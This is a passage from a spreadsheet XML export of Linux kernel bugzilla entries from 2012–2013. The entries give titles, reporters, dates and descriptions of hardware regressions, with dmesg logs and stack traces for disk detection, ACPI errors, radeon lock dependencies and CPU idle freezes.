  </si>
  <si>
    <t>Kouichi ONO</t>
  </si>
  <si>
    <t>2013-11-19 16:54 UTC</t>
  </si>
  <si>
    <t>After upgrading from 3.6.9 to 3.7, HighPoint RocketRAID 2720 (mvsas) failed to detect some hdd. 7 SATA hdds are connected, but only 2 or 3 hdds are detected. I bisected and found bad commit: 65fe1f0f66a57380229a4ced844188103135f37b is the first bad commit commit 65fe1f0f66a57380229a4ced844188103135f37b Author: Shane Huang &lt;shane.huang@amd.com&gt; Date: Fri Sep 7 22:40:01 2012 +0800 ahci: implement aggressive SATA device sleep support Device Sleep is a feature as described in AHCI 1.3.1 Technical Proposal. This feature enables an HBA and SATA storage device to enter the DevSleep interface state, enabling lower power SATA-based systems. Aggressive Device Sleep enables the HBA to assert the DEVSLP signal as soon as there are no commands outstanding to the device and the port specific Device Sleep idle timer has expired. This enables autonomous entry into the DevSleep interface state without waiting for software in power sensitive systems. This patch enables Aggressive Device Sleep only if both host controller and device support it. Tested on AMD reference board together with Device Sleep supported device sample. Signed-off-by: Shane Huang &lt;shane.huang@amd.com&gt; Reviewed-by: Aaron Lu &lt;aaron.lwe@gmail.com&gt; Signed-off-by: Jeff Garzik &lt;jgarzik@redhat.com&gt; :040000 040000 9441b703760224de98a80546977129214d9528f8 436fe4f42392a48b4564f09cad69dafbe82be2c1 M drivers :040000 040000 3177c859173da3d15f3c2fb287364f063aa420d9 a39a26dc3f6c0b21433688420a820b121a921cec M include Revert 65fe1f0f66a from 3.7.1, all hdds are detected.</t>
  </si>
  <si>
    <t>e1000e unsupported speed/duplex</t>
  </si>
  <si>
    <t>3.8-rc1</t>
  </si>
  <si>
    <t>2012-12-26 18:42 UTC</t>
  </si>
  <si>
    <t>onorua</t>
  </si>
  <si>
    <t>2013-11-19 16:50 UTC</t>
  </si>
  <si>
    <t>After upgrade to 3.8-rc1, and suspend/resume/reboot I got error message: e100e unsupported speed/duplex Looks similar to Bug 36132. Ethernet doesn't work: === # ethtool eth0 Settings for eth0: Cannot get device settings: No such device Cannot get wake-on-lan settings: No such device Cannot get message level: No such device Cannot get link status: No such device No data available === with 3.5.5 kernel works as expected. Please let me know if you need more info.</t>
  </si>
  <si>
    <t>[PATCH]After upgrade 3.4.9 -&gt; 3.5.7 on iBook G4 - snd-aoa-codec-tas driver does not find i2c device</t>
  </si>
  <si>
    <t>2012-12-27 07:18 UTC</t>
  </si>
  <si>
    <t>2016-01-20 23:38 UTC</t>
  </si>
  <si>
    <t>Original message: I've updated kernel on my iBook G4 to 3.5.7 and now the sound is gone. I'm always trying to keep the same .config file between versions so it must have something changed in the snd driver source. I booted 3.4.9 back and sound is back. Dmesg on 3.4.9 says: [ 9.172879] i2c i2c-0: PMac Keywest Audio: attach_adapter method is deprecated [ 9.179522] i2c i2c-0: Please use another way to instantiate your i2c_client [ 9.186147] i2c i2c-1: PMac Keywest Audio: attach_adapter method is deprecated [ 9.192745] i2c i2c-1: Please use another way to instantiate your i2c_client [ 9.199305] i2c i2c-2: PMac Keywest Audio: attach_adapter method is deprecated [ 9.205880] i2c i2c-2: Please use another way to instantiate your i2c_client [ 9.212573] i2c i2c-3: PMac Keywest Audio: attach_adapter method is deprecated [ 9.219141] i2c i2c-3: Please use another way to instantiate your i2c_client [ 9.225796] i2c i2c-4: PMac Keywest Audio: attach_adapter method is deprecated [ 9.232436] i2c i2c-4: Please use another way to instantiate your i2c_client [ 9.289233] input: PowerMac Beep as /devices/pci0001:10/0001:10:17.0/input/input3 [ 9.297287] i2c i2c-0: aoa_codec_onyx: attach_adapter method is deprecated [ 9.304091] i2c i2c-0: Please use another way to instantiate your i2c_client [ 9.310996] i2c i2c-1: aoa_codec_onyx: attach_adapter method is deprecated [ 9.317913] i2c i2c-1: Please use another way to instantiate your i2c_client [ 9.324838] i2c i2c-2: aoa_codec_onyx: attach_adapter method is deprecated [ 9.331715] i2c i2c-2: Please use another way to instantiate your i2c_client [ 9.338683] i2c i2c-3: aoa_codec_onyx: attach_adapter method is deprecated [ 9.345643] i2c i2c-3: Please use another way to instantiate your i2c_client [ 9.352608] i2c i2c-4: aoa_codec_onyx: attach_adapter method is deprecated [ 9.359587] i2c i2c-4: Please use another way to instantiate your i2c_client [ 9.366681] i2c i2c-0: aoa_codec_tas: attach_adapter method is deprecated [ 9.373721] i2c i2c-0: Please use another way to instantiate your i2c_client [ 9.380767] i2c i2c-1: aoa_codec_tas: attach_adapter method is deprecated [ 9.387806] i2c i2c-1: Please use another way to instantiate your i2c_client [ 9.394826] i2c i2c-2: aoa_codec_tas: attach_adapter method is deprecated [ 9.401819] i2c i2c-2: Please use another way to instantiate your i2c_client [ 9.408818] snd-aoa-codec-tas: found 'deq' node [ 9.408831] i2c i2c-2: Failed to register i2c client aoa_codec_tas at 0x35 (-16) [ 9.415836] i2c i2c-3: aoa_codec_tas: attach_adapter method is deprecated [ 9.422814] i2c i2c-3: Please use another way to instantiate your i2c_client [ 9.429780] i2c i2c-4: aoa_codec_tas: attach_adapter method is deprecated [ 9.436736] i2c i2c-4: Please use another way to instantiate your i2c_client On 3.5.7 it looks pretty much like this above, except that whole aoa_codec_onyx deprecation warnings are gone (!) and tas found message looks different: snd-aoa-codec-tas: tas found, addr ... (I don't have original log now, this is produced by printk(KERN_DEBUG "snd-aoa-codec-tas: tas found, addr 0x%02x on %s\n", addr ... line in /linux/sound/aoa/codecs/snd-aoa-codec-tas.c), theres no "'deq' node" piece in 3.5.7 dmesg. When there's no sound, udev does not create mixer and audio output devices, alsamixer, aumix nor mplayer -ao oss does not work - all these thing complain they can't find devices in /dev tree. This bug does not affect my other G4 machine (PowerBook alluminium), I upgraded it to 3.5.7 some time ago and sound is working fine, alsamixer starts without single complain, dmesg for 3.5.7 says much less than on iBook: [ 13.835230] snd-powermac no longer handles any machines with a layout-id property in the device-tree, use snd-aoa. [ 13.838870] snd-aoa-fabric-layout: Using direct GPIOs [ 13.839437] snd-aoa-fabric-layout: can use this codec [ 13.908550] snd-aoa-codec-tas: tas found, addr 0x35 on /pci@f2000000/mac-io@17/i2c@18000/deq@6a Comment from gentoo.org: See http://lists.lm-sensors.org/pipermail/lm-sensors/2011-April/032320.html which reveals in an short explanation that &gt; attach_adapter is scheduled to be removed in September 2011. The message above is a help call from the ... driver, asking for someone to rewrite it to match the current API. The audio driver and codec have been calling a method that was removed from the kernel over time, the warning produced warns the audio developer of that. So, when the method was finally removed between 3.4.9 and 3.5.7 you no longer have audio since the method is gone. In order to get your audio back, you will need the developer to rewrite the broken part of the audio driver or find an alternative driver if one exists. So, I would suggest you to report this at the kernel bugzilla to at least make the developer(s) aware; make sure to search first, to see if a bug exist already. When you do that, please link this bug to that upstream bug such that the bugs cat track each other. Good luck!</t>
  </si>
  <si>
    <t>Some ACPI errors on an Acer Aspire One AO725</t>
  </si>
  <si>
    <t>3.7.1</t>
  </si>
  <si>
    <t>2013-01-02 21:35 UTC</t>
  </si>
  <si>
    <t>Francesco Muzio</t>
  </si>
  <si>
    <t>2014-03-04 08:24 UTC</t>
  </si>
  <si>
    <t>Created attachment 90191 [details] output of "dmesg | grep -i acpi" I have an Acer Aspire One AO725 netbook in which everything (ACPI related) seems to work perfectly the battery/ac adapter management, works the power button, works the Lid Switch, works the FN key to swiitch on/off the wireless, works the FN keys to control the brightness backlight, works but I see some ACPI error in the dmesg who I do not know and do not understand, like these: ACPI Warning: 0x0000000000000b00-0x0000000000000b07 SystemIO conflicts with Region \_SB_.PCI0.SMBS.SMB0 1 (20120913/utaddress-251) [ 5.375825] ACPI Error: [SSZE] Namespace lookup failure, AE_ALREADY_EXISTS (20120913/dsfield-211) [ 5.376075] ACPI Error: Method parse/execution failed [\_SB_.ACAD._PSR] (Node ffff88010a287c18), AE_ALREADY_EXISTS (20120913/psparse-536) [ 5.376315] ACPI Exception: AE_ALREADY_EXISTS, Error reading AC Adapter state (20120913/ac-122) I have attached the "dmesg | grep -i acpi" output of my netbook I hope you help me understand what these error messages Thanks Francesco Muzio</t>
  </si>
  <si>
    <t>possible circular locking dependency detected in radeon driver</t>
  </si>
  <si>
    <t>3.8-rc2</t>
  </si>
  <si>
    <t>2013-01-03 13:04 UTC</t>
  </si>
  <si>
    <t>2013-07-23 14:00 UTC</t>
  </si>
  <si>
    <t>Kernel 3.8-rc2 Slackware64 14 Core i7, 6 GB RAM, 64 bit mode Since kernel 3.8-rc2 with kmemcheck and lockdep hacking options turned on, I get the following lockdep warning: EXT4-fs (sda3): re-mounted. Opts: discard,commit=0 ====================================================== [ INFO: possible circular locking dependency detected ] 3.8.0-rc2 #21 Not tainted ------------------------------------------------------- 99video/2835 is trying to acquire lock: ((fb_notifier_list).rwsem){.+.+.+}, at: [&lt;ffffffff8109f2f4&gt;] __blocking_notifier_call_chain+0x54/0xd0 but task is already holding lock: (console_lock){+.+.+.}, at: [&lt;ffffffff81344a65&gt;] store_fbstate+0x55/0x80 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #1 (console_lock){+.+.+.}: [&lt;ffffffff810c9eaa&gt;] lock_acquire+0x5a/0x70 [&lt;ffffffff810756e7&gt;] console_lock+0x57/0x60 [&lt;ffffffff813a1874&gt;] register_con_driver+0x34/0x140 [&lt;ffffffff813a2fe9&gt;] take_over_console+0x29/0x60 [&lt;ffffffff8134a90b&gt;] fbcon_takeover+0x5b/0xb0 [&lt;ffffffff8134f7ad&gt;] fbcon_event_notify+0x72d/0x830 [&lt;ffffffff8109f00e&gt;] notifier_call_chain+0x5e/0x150 [&lt;ffffffff8109f30d&gt;] __blocking_notifier_call_chain+0x6d/0xd0 [&lt;ffffffff8109f381&gt;] blocking_notifier_call_chain+0x11/0x20 [&lt;ffffffff81340df6&gt;] fb_notifier_call_chain+0x16/0x20 [&lt;ffffffff8134301d&gt;] register_framebuffer+0x1bd/0x2f0 [&lt;ffffffff813adf43&gt;] drm_fb_helper_single_fb_probe+0x1d3/0x2f0 [&lt;ffffffff813ae231&gt;] drm_fb_helper_initial_config+0x1d1/0x240 [&lt;ffffffff81417b1a&gt;] radeon_fbdev_init+0xba/0x110 [&lt;ffffffff81412a01&gt;] radeon_modeset_init+0x501/0xb60 [&lt;ffffffff813f00d0&gt;] radeon_driver_load_kms+0xe0/0x150 [&lt;ffffffff813bb5ce&gt;] drm_get_pci_dev+0x17e/0x2b0 [&lt;ffffffff813d643a&gt;] radeon_pci_probe+0xaa/0xe0 [&lt;ffffffff8132f196&gt;] local_pci_probe+0x46/0x80 [&lt;ffffffff8132f7c1&gt;] pci_device_probe+0x101/0x110 [&lt;ffffffff8146cb86&gt;] driver_probe_device+0x76/0x220 [&lt;ffffffff8146cdd3&gt;] __driver_attach+0xa3/0xb0 [&lt;ffffffff8146ae4d&gt;] bus_for_each_dev+0x4d/0x90 [&lt;ffffffff8146c6d9&gt;] driver_attach+0x19/0x20 [&lt;ffffffff8146c2a0&gt;] bus_add_driver+0x1a0/0x270 [&lt;ffffffff8146d442&gt;] driver_register+0x72/0x170 [&lt;ffffffff8132f89f&gt;] __pci_register_driver+0x5f/0x70 [&lt;ffffffff813bb815&gt;] drm_pci_init+0x115/0x130 [&lt;ffffffff820a7460&gt;] radeon_init+0xe7/0xe9 [&lt;ffffffff810002da&gt;] do_one_initcall+0x11a/0x170 [&lt;ffffffff81811aec&gt;] kernel_init+0x11c/0x290 [&lt;ffffffff8182ffec&gt;] ret_from_fork+0x7c/0xb0 -&gt; #0 ((fb_notifier_list).rwsem){.+.+.+}: [&lt;ffffffff810c96f0&gt;] __lock_acquire+0x1a20/0x1ca0 [&lt;ffffffff810c9eaa&gt;] lock_acquire+0x5a/0x70 [&lt;ffffffff8182ca39&gt;] down_read+0x39/0x8c [&lt;ffffffff8109f2f4&gt;] __blocking_notifier_call_chain+0x54/0xd0 [&lt;ffffffff8109f381&gt;] blocking_notifier_call_chain+0x11/0x20 [&lt;ffffffff81340df6&gt;] fb_notifier_call_chain+0x16/0x20 [&lt;ffffffff81341516&gt;] fb_set_suspend+0x46/0x60 [&lt;ffffffff81344a70&gt;] store_fbstate+0x60/0x80 [&lt;ffffffff81468493&gt;] dev_attr_store+0x13/0x20 [&lt;ffffffff811b813b&gt;] sysfs_write_file+0xdb/0x150 [&lt;ffffffff81148b86&gt;] vfs_write+0xa6/0x160 [&lt;ffffffff81148e90&gt;] sys_write+0x50/0xa0 [&lt;ffffffff81830092&gt;] system_call_fastpath+0x16/0x1b other info that might help us debug this: Possible unsafe locking scenario: CPU0 CPU1 ---- ---- lock(console_lock); lock((fb_notifier_list).rwsem); lock(console_lock); lock((fb_notifier_list).rwsem); *** DEADLOCK *** 4 locks held by 99video/2835: #0: (&amp;buffer-&gt;mutex){+.+.+.}, at: [&lt;ffffffff811b80a3&gt;] sysfs_write_file+0x43/0x150 #1: (s_active#124){.+.+.+}, at: [&lt;ffffffff811b8123&gt;] sysfs_write_file+0xc3/0x150 #2: (&amp;fb_info-&gt;lock){+.+.+.}, at: [&lt;ffffffff813412c1&gt;] lock_fb_info+0x21/0x60 #3: (console_lock){+.+.+.}, at: [&lt;ffffffff81344a65&gt;] store_fbstate+0x55/0x80 stack backtrace: Pid: 2835, comm: 99video Not tainted 3.8.0-rc2 #21 Call Trace: [&lt;ffffffff81823b11&gt;] print_circular_bug+0x28e/0x29f [&lt;ffffffff810c96f0&gt;] __lock_acquire+0x1a20/0x1ca0 [&lt;ffffffff810c9eaa&gt;] lock_acquire+0x5a/0x70 [&lt;ffffffff8109f2f4&gt;] ? __blocking_notifier_call_chain+0x54/0xd0 [&lt;ffffffff810c4e0f&gt;] ? __lock_is_held+0x5f/0x90 [&lt;ffffffff8182ca39&gt;] down_read+0x39/0x8c [&lt;ffffffff8109f2f4&gt;] ? __blocking_notifier_call_chain+0x54/0xd0 [&lt;ffffffff8109f2f4&gt;] __blocking_notifier_call_chain+0x54/0xd0 [&lt;ffffffff8109f2f4&gt;] __blocking_notifier_call_chain+0x54/0xd0 [&lt;ffffffff8109f381&gt;] blocking_notifier_call_chain+0x11/0x20 [&lt;ffffffff81340df6&gt;] fb_notifier_call_chain+0x16/0x20 [&lt;ffffffff81341516&gt;] fb_set_suspend+0x46/0x60 [&lt;ffffffff810756e7&gt;] ? console_lock+0x57/0x60 [&lt;ffffffff81344a65&gt;] ? store_fbstate+0x55/0x80 [&lt;ffffffff81344a70&gt;] store_fbstate+0x60/0x80 [&lt;ffffffff81468493&gt;] dev_attr_store+0x13/0x20 [&lt;ffffffff811b813b&gt;] sysfs_write_file+0xdb/0x150 [&lt;ffffffff81148b86&gt;] vfs_write+0xa6/0x160 [&lt;ffffffff81148e90&gt;] sys_write+0x50/0xa0 [&lt;ffffffff81830092&gt;] system_call_fastpath+0x16/0x1b PM: Syncing filesystems ... done. WARNING: kmemcheck: Caught 16-bit read from uninitialized memory (ffff8801c52bbc20) 010000000000000001000000000000000000000000000000b0bb2bc50188ffff u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u ^ Pid: 2256, comm: X Not tainted 3.8.0-rc2 #21 Acer Aspire 7750G/JE70_HR RIP: 0010:[&lt;ffffffff813ac091&gt;] [&lt;ffffffff813ac091&gt;] drm_fb_helper_setcmap+0x111/0x400 RSP: 0018:ffff8801c0c35978 EFLAGS: 00010206 RAX: ffff8801c52bbc00 RBX: ffff8801c476e800 RCX: 0000000000000000 RDX: 000000000000000f RSI: ffff8801c52bb850 RDI: 00000000000000ff RBP: ffff8801c0c35a48 R08: 00000000001d5300 R09: 0000000000ffffff R10: 0000000000000000 R11: 000000000000ffff R12: 0000000000000000 R13: 0000000000000010 R14: 0000000000000010 R15: ffff8801c52bb800 FS: 00007f34900ed8c0(0000) GS:ffff8801c7e00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff8801c644bf10 CR3: 00000001c30d3000 CR4: 00000000000407f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 [&lt;ffffffff81344375&gt;] fb_set_cmap+0x65/0x140 [&lt;ffffffff81341dff&gt;] fb_set_var+0x1cf/0x480 [&lt;ffffffff8134be21&gt;] fbcon_blank+0x1e1/0x2e0 [&lt;ffffffff813a3f79&gt;] do_unblank_screen+0xa9/0x1d0 [&lt;ffffffff81399744&gt;] complete_change_console+0x64/0xf0 [&lt;ffffffff8139aa32&gt;] vt_ioctl+0x1262/0x1350 [&lt;ffffffff8138fd98&gt;] tty_ioctl+0x2c8/0xd10 [&lt;ffffffff8115aae7&gt;] do_vfs_ioctl+0x97/0x5a0 [&lt;ffffffff8115b03b&gt;] sys_ioctl+0x4b/0x90 [&lt;ffffffff81830092&gt;] system_call_fastpath+0x16/0x1b [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff WARNING: kmemcheck: Caught 16-bit read from uninitialized memory (ffff8801c52bbe20) ea00000077000000260000000b00000002000000040000000100000001000000 u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u ^ Pid: 2256, comm: X Not tainted 3.8.0-rc2 #21 Acer Aspire 7750G/JE70_HR RIP: 0010:[&lt;ffffffff813ac0af&gt;] [&lt;ffffffff813ac0af&gt;] drm_fb_helper_setcmap+0x12f/0x400 RSP: 0018:ffff8801c0c35978 EFLAGS: 00010246 RAX: ffff8801c52bbe00 RBX: ffff8801c476e800 RCX: 0000000000000000 RDX: 0000000000000010 RSI: ffff8801c52bb850 RDI: 00000000000000ff RBP: ffff8801c0c35a48 R08: 00000000001d5300 R09: 0000000000ffffff R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000010 R13: 0000000000000010 R14: 0000000000000010 R15: ffff8801c52bb800 FS: 00007f34900ed8c0(0000) GS:ffff8801c7e00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff8801c644bf10 CR3: 00000001c30d3000 CR4: 00000000000407f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 [&lt;ffffffff81344375&gt;] fb_set_cmap+0x65/0x140 [&lt;ffffffff81341dff&gt;] fb_set_var+0x1cf/0x480 [&lt;ffffffff8134be21&gt;] fbcon_blank+0x1e1/0x2e0 [&lt;ffffffff813a3f79&gt;] do_unblank_screen+0xa9/0x1d0 [&lt;ffffffff81399744&gt;] complete_change_console+0x64/0xf0 [&lt;ffffffff8139aa32&gt;] vt_ioctl+0x1262/0x1350 [&lt;ffffffff8138fd98&gt;] tty_ioctl+0x2c8/0xd10 [&lt;ffffffff8115aae7&gt;] do_vfs_ioctl+0x97/0x5a0 [&lt;ffffffff8115b03b&gt;] sys_ioctl+0x4b/0x90 [&lt;ffffffff81830092&gt;] system_call_fastpath+0x16/0x1b [&lt;ffffffffffffffff&gt;] 0xffffffffffffffff WARNING: kmemcheck: Caught 16-bit read from uninitialized memory (ffff8801c4778020) 000000000000000010fa0881ffffffff00000000000000000000000000000000 u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u u ^ Pid: 2256, comm: X Not tainted 3.8.0-rc2 #21 Acer Aspire 7750G/JE70_HR RIP: 0010:[&lt;ffffffff813ac0b8&gt;] [&lt;ffffffff813ac0b8&gt;] drm_fb_helper_setcmap+0x138/0x400 RSP: 0018:ffff8801c0c35978 EFLAGS: 00010246 RAX: ffff8801c4778000 RBX: ffff8801c476e800 RCX: 0000000000000000 RDX: 0000000000000010 RSI: ffff8801c52bb850 RDI: 00000000000000ff RBP: ffff8801c0c35a48 R08: 00000000001d5300 R09: 00000000000000ea R10: 0000000000000000 R11: 0000000000000001 R12: 0000000000000010 R13: 0000000000000010 R14: 0000000000000010 R15: ffff8801c52bb800 FS: 00007f34900ed8c0(0000) GS:ffff8801c7e00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffff8801c644bf10 CR3: 00000001c30d3000 CR4: 00000000000407f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 [&lt;ffffffff81344375&gt;] fb_set_cmap+0x65/0x140 [&lt;ffffffff81341dff&gt;] fb_set_var+0x1cf/0x480 [&lt;ffffffff8134be21&gt;] fbcon_blank+0x1e1/0x2e0 [&lt;ffffffff813a3f79&gt;] do_unblank_screen+0xa9/0x1d0 [&lt;ffffffff81399744&gt;] complete_change_console+0x64/0xf0 [&lt;ffffffff8139aa32&gt;] vt_ioctl+0x1262/0x1350 [&lt;ffffffff8138fd98&gt;] tty_ioctl+0x2c8/0xd10 [&lt;ffffffff8115aae7&gt;] do_vfs_ioctl+0x97/0x5a0 [&lt;ffffffff8115b03b&gt;] sys_ioctl+0x4b/0x90 [&lt;ffffffff81830092&gt;] system_call_fastpath+0x16/0x1b etc. (uninitialized read is already reported in another bugzilla entry).</t>
  </si>
  <si>
    <t>System freeze with memory leak when attaching HDD</t>
  </si>
  <si>
    <t>3.6.10, 3.2.xx</t>
  </si>
  <si>
    <t>2013-01-04 20:11 UTC</t>
  </si>
  <si>
    <t>Christian Stadelmann</t>
  </si>
  <si>
    <t>2013-11-19 16:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 90511 [details] all contents of /var/log/messages related to this freeze/event. A HDD from a friend (some SATA 3GB/s model) seems to be corrupted. When I connect it to my PC the system freezes (e.g. switching to TTYs not possible any more). I can reproduce this with 2 different Distributions: 1. Ubuntu 12.04 LTS amd64, 3.2.xx kernel, in default configuration to automatically mounting the hard disk partitions 2. Fedora 17 amd64 with 3.6. kernel (3.6.10-2.fc17.x86_64) and udev 182-3.fc17 installed, in default configuration to automatically mount the hard disk partitions Btw: Windows 7 is also unable to mount or manage this hard disk but does not freeze. The HDD worked fine for some (~2) years. It is a WD7500BPVT SATA2 with 8MB Cache, 4kB Sector size (Advanced Format) from an Acer Aspire Notebook.</t>
  </si>
  <si>
    <t>usb device removed from sysfs before input children devices</t>
  </si>
  <si>
    <t>2013-01-08 13:24 UTC</t>
  </si>
  <si>
    <t>2013-11-19 14:08 UTC</t>
  </si>
  <si>
    <t>Created attachment 90741 [details] udevadm monitor log On coming out of suspend my usb bluetooth adaptor is being reset by the system. In linux 3.7 the usb devices are being removed from the sysfs tree first, and then the various 'child' devices (like my bluetooth mouse &amp; keyboard related devices) afterwards. This is causing the udev events for the input devices to have 'orphaned' sysfs paths in the udev events. This in term means the Xorg evdev driver does not recognise the events, and so doesn't see the removal of in the put devices. This has been picked by some downstream distributions, e.g. see this thread by Google Chrome developers: http://code.google.com/p/chromium-os/issues/detail?id=33813 Back on linux 3.2 this was not the case. The usb adaptor was reset, but device removal was orderly: first the input devices (will full paths in the udev events), then the usb devices walking up the tree. The attachment is a fragment captured by udevadm monitor when running 3.7. See how the usb devices are moved first, and then the input/bluetooth related stuff with path-heads removed (paths are now /hci0/... instead of /devices/...)</t>
  </si>
  <si>
    <t>CPU overheating with linux 3.8-rc3</t>
  </si>
  <si>
    <t>3.8-rc3</t>
  </si>
  <si>
    <t>2013-01-12 13:22 UTC</t>
  </si>
  <si>
    <t>John Swing</t>
  </si>
  <si>
    <t>2013-11-12 15:18 UTC</t>
  </si>
  <si>
    <t>Created attachment 91061 [details] lspci -vvnn Hello, Since updating to linux 3.8-rc3 my CPU is clearly overheating compared to linux 3.7. kernel Idle Busy (VLC playing, Chromium open with several tabs) 3.7 46°C 51°C 3.8-rc3 54° 61°C Diff +8°C +10°C There is no problem with CPU load, in both case it stay around the same percentage. John. Details : uname -a =&gt; Linux lucas-K55VD 3.8.0-0-generic #3-Ubuntu SMP Fri Jan 11 17:24:16 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux cat /proc/version_signature =&gt; Ubuntu 3.8.0-0.3-generic 3.8.0-rc3 lspci =&gt; 00:00.0 Host bridge: Intel Corporation 3rd Gen Core processor DRAM Controller (rev 09) 00:01.0 PCI bridge: Intel Corporation Xeon E3-1200 v2/3rd Gen Core processor PCI Express Root Port (rev 09) 00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09) 00:14.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB xHCI Host Controller (rev 04) 00:16.0 Communication controller: Intel Corporation 7 Series/C210 Series Chipset Family MEI Controller #1 (rev 04) 00:1a.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #2 (rev 04) 00:1b.0 Audio device: Intel Corporation 7 Series/C210 Series Chipset Family High Definition Audio Controller (rev 04) 00:1c.0 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 1 (rev c4) 00:1c.1 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 2 (rev c4) 00:1c.3 PCI bridge: Intel Corporation 7 Series/C210 Series Chipset Family PCI Express Root Port 4 (rev c4) 00:1d.0 USB controller: Intel Corporation 7 Series/C210 Series Chipset Family USB Enhanced Host Controller #1 (rev 04) 00:1f.0 ISA bridge: Intel Corporation HM76 Express Chipset LPC Controller (rev 04) 00:1f.2 SATA controller: Intel Corporation 7 Series Chipset Family 6-port SATA Controller [AHCI mode] (rev 04) 00:1f.3 SMBus: Intel Corporation 7 Series/C210 Series Chipset Family SMBus Controller (rev 04) 01:00.0 VGA compatible controller: NVIDIA Corporation Device 1058 (rev a1) 03:00.0 Network controller: Intel Corporation Centrino Wireless-N 2230 (rev c4) 04:00.0 Unassigned class [ff00]: Realtek Semiconductor Co., Ltd. Device 5289 (rev 01) 04:00.2 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 0a)</t>
  </si>
  <si>
    <t>MCE unless "idle=poll" -- Toshiba P875 laptop w/ i7-3610qm</t>
  </si>
  <si>
    <t>cpuidle</t>
  </si>
  <si>
    <t>Any</t>
  </si>
  <si>
    <t>2013-01-21 16:47 UTC</t>
  </si>
  <si>
    <t>J. Vich</t>
  </si>
  <si>
    <t>2014-05-20 04:50 UTC</t>
  </si>
  <si>
    <t>I tried to install various current Linux distros on my new Toshiba P875 laptop with i7-3610qm CPU. Tried kubuntu 12.04, 12.10, opensuse 12.2, all 64-bit. All the same behavior: During regular use, have been getting radnom MCEs realted to intel_idle usage. After googling around and finiding similar issues by others, I disabled intel_idle usage and went to acpi_idle. Freezes were the same, but the exception description was related to acpi_idle. Therefore I disabled any idling by adding "intel_idle.max_cstate=0 processor.max_cstate=0" to grub booting command line. With these settings, on first start of the day (or after longer being shut down), I got always one freeze again related to cpu idle states. After hard turn off by holding the powerbutton and one more start, it boots always normally and runs normally with no more freezes / MCEs at all. So in simple words: when there were no idle-disabling states added to grub for booting, there were random MCEs during usage, but no hang during the first boot ; after adding the idle-disabling states to grub, there is always one MCE hang during first boot of the day, but no freezes during usage and full stablity overall (tested with turbostat and full load by appropriate cat). I did the full memtest, no errors. Kernels tried: 3.2.0, stock 12.04 kernel (3.5), also 3.7.1, now trying 3.8.0 from raring, all the same. Turbostat prooved that frequency scaling works normally with disabled cstates, but "cat /sys/devices/system/cpu/cpuidle/current_driver" shows correctly "none". I tried all the kernel ide options (mwait, safe_half, poll) and it's all the same. Screenshots: the first one is from freeze during usage, without those cstate disabling parameters. The second one is that "first of the day" MCE freeze.</t>
  </si>
  <si>
    <t>ASUS N56VZ screen brightness keys not working</t>
  </si>
  <si>
    <t>3.8 git</t>
  </si>
  <si>
    <t>2013-01-23 17:53 UTC</t>
  </si>
  <si>
    <t>Micael Dias</t>
  </si>
  <si>
    <t>2013-09-16 01:53 UTC</t>
  </si>
  <si>
    <t>Screen brightness keys don't do anything on my Asus N56VZ notebook. I tried the various "acpi_osi" and "acpi_backlight" options and the only thing that kind of works is passing "acpi_osi=" (empty) as a kernel option, but all this does is letting the BIOS handle the brightness itself. Therefore I don't get the "pretty" notifications of screen brightness changes. The key command never seems to reach linux. I have tried "xev", cat /dev/input/eventX and even modifying the asus-wmi module to print messages of the commands it receives, and it doesn't receive the screen brightness key commands. It does receive all others though. I have yet to notice any weird behaviour resulting from "acpi_osi=" argument, but it could be a problem later. I have tried to use a modified DSDT table to remove OS checks on the screen brightness key methods and try several tricks like emitting a specific brightness code (just like the other simpler Fn keys do) to no avail. To make sure the methods are being called I tried to make the brightness keys change the volume instead, and it works.</t>
  </si>
  <si>
    <t>Problems with gpe13 interrupt storm on HP Compaq 6710b and Samsung 700Z5C.</t>
  </si>
  <si>
    <t>3.7.4</t>
  </si>
  <si>
    <t>2013-01-26 13:38 UTC</t>
  </si>
  <si>
    <t>James.Dutton</t>
  </si>
  <si>
    <t>2016-07-01 10:24 UTC</t>
  </si>
  <si>
    <t>Created attachment 91841 [details] acpidump -b Some more detailed context can be found here: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/887793 Scope (_GPE) { Method (_L13, 0, NotSerialized) { If (LEqual (PFLV, FDTP)) { Return (Zero) } Store (Zero, GPE3) Or (GL08, 0x10, GL08) Notify (\_SB.PCI0.SAT0, 0x82) Return (Zero) } } This is the DSDT code for GPE13 on a Samsung Series 7 700Z5C laptop. There error reported by the Linux kernel is: ev_queue_notify_reques: No notify handler for Notify, ignoring (SAT0, 82) Now, my question is: How do I find out what device is causing the GPE13 interrupt and why? How do I work out what code (which device register bit to reset) I have to put in this Notify handler in order to silence the interrupt storm?</t>
  </si>
  <si>
    <t>vgaswitcheroo not working anymore</t>
  </si>
  <si>
    <t>2013-01-27 17:16 UTC</t>
  </si>
  <si>
    <t>cem.aydin</t>
  </si>
  <si>
    <t>2013-11-18 16:23 UTC</t>
  </si>
  <si>
